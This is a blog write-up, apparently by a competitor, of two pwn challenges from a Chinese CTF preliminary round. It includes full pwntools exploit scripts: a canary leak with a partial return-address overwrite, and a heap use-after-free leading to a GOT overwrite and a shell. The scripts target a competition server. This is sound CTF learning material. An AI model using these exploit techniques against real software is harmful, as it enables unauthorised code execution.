铁三初赛PWN Wp

First Post:

Last Update:

Word Count:
1k

Read Time:
5 min

铁三初赛PWN

多亏师傅们带飞,本次排名第四赛区第二,排名如下^_^

img

pwn1[namepie]

1
2
3
4
5
6
7
8
9
10
11
12
ssize_t sub_9A0()
{
  char s; // [rsp+0h] [rbp-30h]
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&s, 0, 0x1EuLL);
  puts("Input your Name:");
  read(0, &s, 0x30uLL);//vul
  printf("hello %s: and what do your want to sey!\n", &s);
  return read(0, &s, 0x60uLL); //vul2 堆栈溢出
}

前言

程序留了后面函数,保护全开

思路

先使用第一次输入泄露cannary,然后在使用后一次输入低字节覆盖return 地址为后门函数地址,打通几率1 / 16

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
libc_path = './libc.so.6'

# remote server ip and port
server_ip = "172.20.14.177"
server_port = 9999

# if local debug
LOCAL = 0
LIBC  = 0

#--------------------------func-----------------------------
def db():
	if(LOCAL):
		gdb.attach(io)


#--------------------------exploit--------------------------
def exploit():
	li('exploit...')
	p = 'A' * 0x28 + '\x01'
	s(p)
	ru('\x01')
	cannary = u64('\x00' + r(7))
	li('cannary: ' + hex(cannary))
	p = 'A' * 0x28
	p += p64(cannary)
	p += p64(0)
	p += '\x71\xaa'
	#db()
	s(p)
	

def finish():
	ia()
	c()

#--------------------------main-----------------------------
if __name__ == '__main__':
	
	#for i in range(255):
	if LOCAL:
		elf = ELF(elf_path)
		if LIBC:
			libc = ELF(libc_path)
			io = elf.process(env = {"LD_PRELOAD" : libc_path} )
		else:
			io = elf.process()
	
	else:
		elf = ELF(elf_path)
		io = remote(server_ip, server_port)
		if LIBC:
			libc = ELF(libc_path)

	exploit()
	finish()

pwn2 [onetime]

前言

pie保护没开,一个菜单堆题,在添加和删除编辑都采用相应的标致来避免重复第二次操作。漏洞点在释放内存后没有将数据指针清0还有在其他操作没有做好相应的检查,造成uaf漏洞。

思路

通过uaf漏洞,打入bss段的buf附近,修改edit_flag为0为了再次实现修改功能,同时修改buf为atoi plt.got地址,然后再通过uaf漏洞泄露libc,再次修改atoi的got中数据为libc中system函数地址,在输入选项时输入’sh\x00’即可获得shell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li  = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')


context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
MODIFY_LD = 0
arch = '64'
libc_v = '2.23'

ld_path   = '/glibc/' + libc_v + '/' + arch + '/lib/ld-linux-x86-64.so.2'
libs_path = '/glibc/' + libc_v + '/' + arch + '/lib'
libc_path = '/glibc/' + libc_v + '/' + arch + '/lib/libc.so.6'
libc_path = './libc.so.6'

# change ld path 
if(MODIFY_LD):
	os.system('cp ' + elf_path + ' ' + elf_path + '.bk')
	change_ld_cmd = 'patchelf  --set-interpreter ' + ld_path +' ' + elf_path
	os.system(change_ld_cmd)
	li('modify ld ok!')
	exit(0)

# remote server ip and port
server_ip = "172.20.14.177"
server_port = 10001

# if local debug
LOCAL = 0
LIBC  = 1


#--------------------------func-----------------------------
def db():
	if(LOCAL):
		gdb.attach(io)

def ad():
	sla('>>', '1')

def fi(d):
	sla('>>', '2')
	sa(':', d)

def dp():
	sla('>>', '3')

def rm():
	sla('>>', '4')

def lv(d):
	sla('>>', '5')
	sa(':', d)

#--------------------------exploit--------------------------
def exploit():
	li('exploit...')
	ad()
	rm()
	p = p64(0x60207d + 0x10)
	fi(p)
	ad()

	p = 'A' * 3
	p += p64(0)
	p += p64(elf.got['atoi'])
	lv(p)

	dp()
	leak = u64(ru('\x7f')[-5:] + '\x7f\x00\x00')
	libc_base = leak - libc.sym['atoi']
	system = libc_base + libc.sym['system']
	li('libc_base: ' +hex(libc_base))

	fi(p64(system))
	#db()
	s('sh\x00')

def finish():
	ia()
	c()

#--------------------------main-----------------------------
if __name__ == '__main__':
	
	if LOCAL:
		elf = ELF(elf_path)
		if LIBC:
			libc = ELF(libc_path)
			io = elf.process(env = {"LD_LIBRARY_PATH" : libs_path, "LD_PRELOAD" : libc_path} )
		else:
			io = elf.process(env = {"LD_LIBRARY_PATH" : libs_path} )
	
	else:
		elf = ELF(elf_path)
		io = remote(server_ip, server_port)
		if LIBC:
			libc = ELF(libc_path)

	exploit()
	finish()

打赏点小钱
支付宝 | Alipay
微信 | WeChat